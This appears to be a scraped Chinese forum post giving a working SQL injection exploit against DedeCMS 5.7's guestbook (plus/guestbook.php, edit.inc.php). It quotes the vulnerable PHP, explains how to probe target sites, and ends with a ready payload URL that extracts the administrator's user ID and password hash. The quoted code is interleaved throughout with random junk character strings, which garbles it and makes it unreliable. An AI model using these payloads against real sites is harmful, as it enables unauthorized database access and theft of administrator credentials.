dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

漏洞文件edit.inc.php具体代码：
7 U9 O3 s3 U; T& p
< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

   
0 T* P! ^% i/ B
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  
. ^% \6 o4 |. H
. S, v# T/ {% a5 X3 jelse $GUEST_BOOK_POS = "guestbook.php";  
  d0 \4 f7 |' y& }0 v
   
* ?3 C7 N0 i2 {( W6 {/ G
$id = intval($id);  
% D- ~" i) j& j, I7 `
8 P, c7 f5 _1 T2 iif(empty($job)) $job='view';  
- d5 W, m. B( x- l
   
3 V: G& C+ z8 t' Z% t
if($job=='del' && $g_isadmin)  
, `* k6 M4 |" a
+ o- T3 V/ I( y( ^# ?# Q. C+ @{  

( x4 d' P& C3 j6 X  v! Z$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

" P! o+ }1 Q& a/ K' _- qexit();  

/ x; j& Q6 V; [! e0 w}  

2 b+ Z$ Z0 C4 ~else if($job=='check' && $g_isadmin)  
- L1 \" B* Q/ G" Z+ I
) {: t3 j7 R# n- ^7 f+ J{  

* I0 h8 ^6 d, s' H  M4 s" I$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  
( I  T7 g9 {3 ?  V/ F% J" X1 s
  ^( f' U' t$ d' ?( J# S  B% mexit();  
0 p7 m) [3 l  R
}  
5 j- w. d5 N0 X! [* C" K6 {
1 r# b+ K% n' {5 zelse if($job=='editok')  

{  
- L# ]3 I; R4 y7 K- \; t) R
: _+ y) `4 F) q$remsg = trim($remsg);  

if($remsg!='')  
, C! @$ l' J! u' J* A* s* \3 a6 A
{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  
5 G; Q# J+ |  ~+ o8 t: l7 G
if($g_isadmin)  
2 b' O) a8 `4 G) s/ N! f4 j" }
{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
6 q. \2 ^( t# h# \7 t* ^
//$remsg <br /><font color=red>管理员回复：</font> }  

else

, a5 Z& _* D/ g{  

7 M8 A3 E+ v6 i* D" o8 X' C$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
* `5 w9 w7 l2 `9 o0 _
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
; C! ^/ V8 M4 @! S2 q1 @6 N
$msg = $oldmsg.$remsg;  
1 C% Q: }' g% P
}  

- ]2 z9 h0 @" Q}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  

7 b3 ^8 |- b7 |$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  
6 l' L8 L6 J2 {
ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  

exit();  

}  
& ]( W/ Z" X- Z0 [8 Y
//home:www.errs.cc  
- s( Q' }% I* p. I5 o( S7 t2 I% Q) v6 a
if($g_isadmin)  

9 w9 J* i+ ^. g. r2 [+ j{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

! ~2 U/ T/ [& E# urequire_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

0 X& y. F+ p' F4 }. Q; J  s}  
! Q% |5 s4 @6 ^2 `
4 N' x# I+ l$ i* P9 ^3 d# ^else
! K6 ?& {6 ]+ a. N5 f% k7 T' y
* p& z6 g6 x$ x, v: d{  
4 u: c5 M  ^; N
$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

4 }3 X% d1 {5 `' I! vrequire_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  
# x. I3 l  K6 |5 B
; o4 g& Z- d1 w1 Y( w} 漏洞成功需要条件：
, W8 y( C7 n9 R, Q) J* D1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
$ I& S, B  I2 P8 W9 f* c. ^) }2 K
怎么判断是否存在漏洞：
3 b5 u  V0 W1 D4 \. s先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
6 R; K* R2 Z$ k# `5 A然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问：
' g1 N. s. ~5 t! f
5 o( P. l- W: o2 \) p# G1 Uwww.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
* C, i# l8 ^7 }5 O' D跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
9 S' ^8 p, j- \
- ?; z8 K9 W6 m% o; P
明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问

www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
& u0 i/ s1 o" S" M" _+ a7 }, ~8 P6 J
, J7 _7 h) k; ]1 J大概利用就是这样，大家有兴趣的多研究下！！
& l" r! L. R2 p) T( F" @4 x, l
  s$ v, v8 J8 R最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

- W2 z3 q9 s3 |: r3 K0 n! f% |5 fview sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='